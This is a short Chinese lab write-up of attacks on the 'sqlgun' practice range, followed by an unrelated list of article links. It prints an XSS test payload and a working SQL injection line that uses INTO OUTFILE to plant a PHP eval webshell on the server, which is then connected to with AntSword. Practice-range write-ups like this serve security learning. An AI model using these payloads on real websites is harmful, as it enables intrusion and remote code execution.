当前位置: 首页 > news >正文

sqlgun靶场漏洞挖掘

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 解码未来:H.265与H.266技术对比及EasyCVR视频汇聚平台编码技术优势
  • SpringBoot集成Thymeleaf模板引擎,为什么使用(详细介绍)
  • 【计算机网络】数据链路层深度解析
  • 初写MySQL四张表:(3/4)
  • 编译QT源码时的configure参数须知
  • vue使用TreeSelect设置带所有父级节点的回显
  • k8s多节点集群搭建
  • 【运维】好用的线上项目运维命令
  • Java之线程篇四
  • 知识|智能网联汽车多域电子电气架构会如何发展?
  • unity 图片置灰shader
  • Datawhale------Tiny-universe学习笔记——Qwen(1)
  • 算法——贡献法
  • k8s 微服务 ingress-nginx 金丝雀发布
  • 几种修改docker默认存储位置的方法
  •  D - 粉碎叛乱F - 其他起义
  • REST架构的思考
  • UMLCHINA 首席专家潘加宇鼎力推荐
  • vue-router 实现分析
  • Vue--数据传输
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 关于Java中分层中遇到的一些问题
  • 基于 Babel 的 npm 包最小化设置
  • 如何解决微信端直接跳WAP端
  • 如何正确配置 Ubuntu 14.04 服务器?
  • 使用权重正则化较少模型过拟合
  • 王永庆:技术创新改变教育未来
  • 正则表达式
  • ​​​​​​​ubuntu16.04 fastreid训练过程
  • ​人工智能之父图灵诞辰纪念日,一起来看最受读者欢迎的AI技术好书
  • #NOIP 2014# day.1 T2 联合权值
  • #pragam once 和 #ifndef 预编译头
  • (14)目标检测_SSD训练代码基于pytorch搭建代码
  • (Redis使用系列) SpirngBoot中关于Redis的值的各种方式的存储与取出 三
  • (二)springcloud实战之config配置中心
  • (数据大屏)(Hadoop)基于SSM框架的学院校友管理系统的设计与实现+文档
  • (四)js前端开发中设计模式之工厂方法模式
  • (一)使用Mybatis实现在student数据库中插入一个学生信息
  • (转)shell调试方法
  • (转)母版页和相对路径
  • .NET 中各种混淆(Obfuscation)的含义、原理、实际效果和不同级别的差异(使用 SmartAssembly)
  • .NET 中小心嵌套等待的 Task,它可能会耗尽你线程池的现有资源,出现类似死锁的情况
  • .NET面试题解析(11)-SQL语言基础及数据库基本原理
  • .Net下的签名与混淆
  • .php结尾的域名,【php】php正则截取url中域名后的内容
  • @ 代码随想录算法训练营第8周(C语言)|Day57(动态规划)
  • @Autowired @Resource @Qualifier的区别
  • @ModelAttribute注解使用
  • [ solr入门 ] - 利用solrJ进行检索
  • [20150321]索引空块的问题.txt
  • [20170705]diff比较执行结果的内容.txt
  • [2669]2-2 Time类的定义
  • [bzoj1901]: Zju2112 Dynamic Rankings
  • [C++]unordered系列关联式容器
  • [C++]类和对象【下】